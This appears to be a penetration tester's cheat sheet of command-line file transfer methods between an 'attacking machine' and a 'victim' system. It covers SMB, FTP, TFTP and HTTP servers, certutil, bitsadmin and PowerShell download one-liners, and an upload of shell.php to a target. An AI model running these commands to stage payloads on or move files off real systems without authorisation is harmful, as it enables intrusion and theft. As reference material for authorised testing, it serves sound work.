CLI File Transfers

filetransfers.txt

SMB
#git clone https://github.com/SecureAuthCorp/impacket.git
#cd impacket
#python setup.py install

cp /usr/share/doc/python3-impacket/examples/smbserver.py /tftp
python3 smbserver.py share-name /tftp

From Linux:
smbclient -L <ip of attacking machine>
smbclient  //<ip of attacking machine>/share-name
--> get <file>
--> put <file>

From Windows:
net view \\ip-address
net use Z: \\computer_name\share-name [/PERSISTENT:YES]
net use Z: \\ip-addr\share-name [/PERSISTENT:YES]
net use Z: /delete

copy \\ip-addr\share-name\file out-file


FTP
# apt install pip
# pip install pyftpdlib


To run ftp server, run following command within the folder to share
python -m pyftpdlib -w -p 21

receive file: 
get <file>
   OR
wget ftp://ip-addr[:port]/file [-o output-file].

send file:
put <file> 
   OR
curl -T <file> ftp://anonymous@<host>



From Windows, non-interactive shell:

echo open ip-addr > ftp.txt
echo username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo GET file.exe >> ftp.txt
echo bye >> ftp.txt

ftp -v -n -s:ftp.txt



TFTPD
mkdir /tftp
atftpd --daemon --port 69 /tftp

# enable TFTP on windows: 
pkgmgr /iu:"TFTP"  
 
From Windows:
tftp -i <ip-address> { GET | PUT } <file>



HTTP Server
# python 2 
python -m SimpleHTTPServer 8000

# python 3
python3 -m http.server 8000

# Ruby
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'

# Ruby 1.9.2+
ruby -run -ehttpd . -p8000 

# php - no directory listing!
php -S 127.0.0.1:8000

# nc - no directory listing
while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"'; done



UPLOAD METHODS:
Linux:
curl --upload-file shell.php --url http://$ip/shell.php --http1.0

On local(attacking) system:
cat filetoupload | base64 -w 0; echo
#double click on output to copy
On Target(victim) System:
echo <copiedContent> | base64 -d > filetoupload



DOWNLOAD METHODS
Windows:
certutil -urlcache -split -f "http://ip-addr:port/file" [output-file]
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')
powershell -c (Start-BitsTransfer -Source "http://ip-addr:port/file -Destination C:\<directory>\file")
powershell wget "http://ip-addr:port/file" -outfile "c:\<directory>\filename"
bitsadmin /transfer job /download /priority high http://ip-addr:port/file c:\<directory>\file
bitsadmin /transfer /Download /priority Foreground https://ip-addr:port/file C:\<directory>\file


Linux:
curl http://<ip-address>:port/<file> -o <output-filename>

wget http://<ip-address>:port/<file> -o <output-filename>
  download ftp with wget, note binary mode is not supported for wget downloads via ftp
wget ftp://<ip-address>/<file> --ftp-user=<username> --ftp-password=<password>

perl -e 'use LWP::Simple; $url = "http://ip-addr:port/file"; $file ="filename"; getstore($url, $file);'

php -r '{ $in=fopen("http://ip-addr/file", "rb"); $out=fopen("filename", "wb"); while ($chunk = fread($in,8192)) { fwrite($out, $chunk, 8192); } fclose($in); fclose($out); } '

ruby -e 'require "net/http"; Net::HTTP.start("ip-addr") { |http|; resp = http.get("/filename"); open("download_via_ruby", "wb") { |file|; file.write(resp.body); }; }'

#python2
python -c 'import urllib2; u = urllib2.urlopen("http://ip-addr/file"); localFile = open("download_via_python", "w"); localFile.write(u.read()); localFile.close()'


REFERENCES:
https://gist.github.com/willurd/5720255
https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/
https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files_to_windows.html
https://blog.ropnop.com/transferring-files-from-kali-to-windows/